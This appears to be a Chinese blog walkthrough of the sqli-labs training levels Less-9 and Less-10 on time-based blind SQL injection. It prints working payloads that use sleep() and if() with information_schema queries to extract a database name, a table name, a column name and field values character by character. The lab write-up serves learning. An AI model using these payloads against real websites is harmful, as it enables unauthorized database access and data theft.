<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.11.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。也可以理解为如果expr为True，则执行expr2，否则执行expr3。sleep(int)：代表过int时间后响应 通过时间盲注类型的注入点判断方法">
<meta property="og:type" content="article">
<meta property="og:title" content="Less 9~10（时间盲注）">
<meta property="og:url" content="http://example.com/2023/03/18/Less-9-10%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89/index.html">
<meta property="og:site_name" content="临摹">
<meta property="og:description" content="if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。也可以理解为如果expr为True，则执行expr2，否则执行expr3。sleep(int)：代表过int时间后响应 通过时间盲注类型的注入点判断方法">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/image/Less-9~10/1.png">
<meta property="og:image" content="http://example.com/image/Less-9~10/2.png">
<meta property="og:image" content="http://example.com/image/Less-9~10/3.png">
<meta property="article:published_time" content="2023-03-18T13:51:43.000Z">
<meta property="article:modified_time" content="2023-03-18T15:45:14.414Z">
<meta property="article:author" content="Justin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/image/Less-9~10/1.png">


<link rel="canonical" href="http://example.com/2023/03/18/Less-9-10%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/03/18/Less-9-10%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89/","path":"2023/03/18/Less-9-10（时间盲注）/","title":"Less 9~10（时间盲注）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Less 9~10（时间盲注） | 临摹</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">临摹</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%E7%B1%BB%E5%9E%8B%E7%9A%84%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A4%E6%96%AD%E6%96%B9%E6%B3%95"><span class="nav-number">1.</span> <span class="nav-text">通过时间盲注类型的注入点判断方法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#less-9%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">less-9（时间盲注）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="nav-number">2.1.</span> <span class="nav-text">判断注入点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E6%96%B9%E5%BC%8F"><span class="nav-number">2.2.</span> <span class="nav-text">判断注入方式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E9%95%BF%E5%BA%A6"><span class="nav-number">2.3.</span> <span class="nav-text">猜解当前数据库名长度</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D"><span class="nav-number">2.4.</span> <span class="nav-text">猜解当前数据库名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%A1%A8%E5%90%8D%E9%95%BF%E5%BA%A6"><span class="nav-number">2.5.</span> <span class="nav-text">猜解第一个表名长度</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%A1%A8%E5%90%8D"><span class="nav-number">2.6.</span> <span class="nav-text">猜解第一个表名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E8%A1%A8%E4%B8%AD%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%88%97%E5%90%8D%E9%95%BF%E5%BA%A6"><span class="nav-number">2.7.</span> <span class="nav-text">猜解表中第一个列名长度</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%88%97%E5%90%8D"><span class="nav-number">2.8.</span> <span class="nav-text">猜解第一个列名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E5%AD%97%E6%AE%B5%E5%80%BC%E9%95%BF%E5%BA%A6"><span class="nav-number">2.9.</span> <span class="nav-text">猜解字段值长度</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E5%AD%97%E6%AE%B5%E5%80%BC"><span class="nav-number">2.10.</span> <span class="nav-text">猜解字段值</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less-10"><span class="nav-number">3.</span> <span class="nav-text">Less-10</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Justin</p>
  <div class="site-description" itemprop="description">适得浮生</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">39</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/18/Less-9-10%EF%BC%88%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Justin">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临摹">
      <meta itemprop="description" content="适得浮生">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Less 9~10（时间盲注） | 临摹">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Less 9~10（时间盲注）
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-03-18 21:51:43 / 修改时间：23:45:14" itemprop="dateCreated datePublished" datetime="2023-03-18T21:51:43+08:00">2023-03-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Sql/" itemprop="url" rel="index"><span itemprop="name">Sql</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。也可以理解为如果expr为True，则执行expr2，否则执行expr3。<br>sleep(int)：代表过int时间后响应</p>
<h1 id="通过时间盲注类型的注入点判断方法"><a href="#通过时间盲注类型的注入点判断方法" class="headerlink" title="通过时间盲注类型的注入点判断方法"></a>通过时间盲注类型的注入点判断方法</h1><span id="more"></span>
<p>测试语句：<br>?id&#x3D;1’ and sleep(2) –+<br>?id&#x3D;1’ and sleep(2) –+<br>查看网页响应时间的方法：在该页面上右键找到检查，进入之后找到网络，如下图：<br><img src="/image/Less-9~10/1.png" alt="打开方式"><br><img src="/image/Less-9~10/2.png" alt="打开方式"><br>可以发现延迟相差为1s，符合条件，测试的注入点为正确注入点</p>
<h1 id="less-9（时间盲注）"><a href="#less-9（时间盲注）" class="headerlink" title="less-9（时间盲注）"></a>less-9（时间盲注）</h1><h2 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h2><p>通过时间盲注判断出注入点为单引号</p>
<h2 id="判断注入方式"><a href="#判断注入方式" class="headerlink" title="判断注入方式"></a>判断注入方式</h2><p>通过order by判断出字段数为3<br>可以根据第四列排序判断注入方式，注入：？id&#x3D;1’ group by 4–+<br><img src="/image/Less-9~10/3.png" alt="打开方式"><br>可以看到页面并没有回显报错信息而且页面也正常显示，所以不能使用报错注入。<br>接下来测试能否使用布尔盲注，使用布尔盲注的前提是页面必须在面对不同的语句的时候有不同的回显。也就是语句正确回显正常，语句错误回显不正常。其实上面的语句就已经证实不能使用布尔盲注了，因为很显然我们输入的语句是错误的，但是页面却回显正常了，所以不能使用布尔盲注。故可用时间注入</p>
<h2 id="猜解当前数据库名长度"><a href="#猜解当前数据库名长度" class="headerlink" title="猜解当前数据库名长度"></a>猜解当前数据库名长度</h2><p>输入语句：?id&#x3D;1’ and if(length(database())&gt;10,sleep(2),0) –+<br>这段代码的含义是：如果当前数据库名长度大于10，则页面延迟 2s 后响应，否则立即响应，之后我们就可以通过查看页面响应时间来判断长度了。<br>最终猜解到数据库名长度：8。</p>
<h2 id="猜解当前数据库名"><a href="#猜解当前数据库名" class="headerlink" title="猜解当前数据库名"></a>猜解当前数据库名</h2><p>输入语句猜解当前数据库的第一个字符：?id&#x3D;1’ and if((left(database(),1)&gt;’m’),sleep(2),0) –+<br>这段代码含义：如果当前数据库名字的第一个字符的ASCII值大于字符 ‘m’ 的ASCII值，则页面延迟 2s 后响应，否则立即响应。当然也可以使用 ascii() 函数进行猜解。<br>使用 ascii() 函数猜解当前数据库名的第二个字符:?id&#x3D;1’ and if((ascii(substr(database(),2,1))&gt;97),sleep(2),0) –+<br>最终猜解到数据库名: security</p>
<h2 id="猜解第一个表名长度"><a href="#猜解第一个表名长度" class="headerlink" title="猜解第一个表名长度"></a>猜解第一个表名长度</h2><p>输入语句：?id&#x3D;1’ and if((length((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 0,1))&gt;10),sleep(2),0) –+<br>最终猜解到表名长度：6</p>
<h2 id="猜解第一个表名"><a href="#猜解第一个表名" class="headerlink" title="猜解第一个表名"></a>猜解第一个表名</h2><p>输入语句猜解第一个表名的第一个字符：?id&#x3D;1’ and if((left((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 0,1),1)&gt;’m’),sleep(2),0) –+<br>最终猜解得出表名为 ‘emails’</p>
<h2 id="猜解表中第一个列名长度"><a href="#猜解表中第一个列名长度" class="headerlink" title="猜解表中第一个列名长度"></a>猜解表中第一个列名长度</h2><p>输入猜解第一个表的第一个列名的长度的语句：?id&#x3D;1’ and if((length(select column_name from information_schema.columns where table_name&#x3D;’emails’ limit 0,1)&gt;10),sleep(2),0) –+<br>经过测试长度为2</p>
<h2 id="猜解第一个列名"><a href="#猜解第一个列名" class="headerlink" title="猜解第一个列名"></a>猜解第一个列名</h2><p>输入猜解第一个列名的第一个字符的语句：?id&#x3D;1’ and if((left((select column_name from information_schema.columns where table_name&#x3D;’emails’ limit 0,1),1)&gt;’m’),sleep(2),0) –+<br>这里使用的是 left() 函数进行猜解。<br>输入猜解第一个列名的第二个字符的语句：?id&#x3D;1’ and if((ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’emails’ limit 0,1),2,1))&gt;97),sleep(2),0) –+<br>这里使用的是 ascii() 函数进行猜解。<br> 最终猜解出来的列名为 ‘id’ </p>
<h2 id="猜解字段值长度"><a href="#猜解字段值长度" class="headerlink" title="猜解字段值长度"></a>猜解字段值长度</h2><p>输入语句:?id&#x3D;1’ and if((length(select id from emails limit 0,1)&gt;10),sleep(2),0) –+<br>最终猜解可得长度为1</p>
<h2 id="猜解字段值"><a href="#猜解字段值" class="headerlink" title="猜解字段值"></a>猜解字段值</h2><p>输入猜解第一个字符的语句：?id&#x3D;1’ and if((left((select id from emails limit 0,1),1)&gt;0),sleep(2),0) –+<br>最终猜解到字段值为 ‘1’</p>
<h1 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h1><p>注入点为双引号的时间盲注，方法与Less-9相同</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/03/18/Less-8%EF%BC%88%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%EF%BC%89/" rel="prev" title="Less 8（布尔盲注）">
                  <i class="fa fa-chevron-left"></i> Less 8（布尔盲注）
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/03/19/Less-11-12%EF%BC%88%E5%9F%BA%E4%BA%8EPOST%E8%A1%A8%E5%8D%95%E6%8F%90%E4%BA%A4%E6%96%B9%E5%BC%8F%E7%9A%84%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%89/" rel="next" title="Less 11~12（基于POST表单提交方式的字符型注入）">
                  Less 11~12（基于POST表单提交方式的字符型注入） <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Justin</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
